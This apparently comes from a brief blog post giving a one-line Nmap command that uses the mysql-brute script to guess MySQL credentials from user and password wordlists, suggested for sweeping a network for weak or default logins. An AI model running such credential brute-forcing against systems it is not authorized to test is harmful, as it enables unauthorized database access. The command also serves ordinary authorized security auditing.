Brute force MySQL with Nmap

Just a quick one liner, you can also incorporate this into a huge sweep of the network which will hopefully identify MySQL databases with weak or default credentials.

nmap -p 3306 10.10.10.10 --script mysql-brute --script-args userdb=user.txt,passdb=pass.txt

Leave a Reply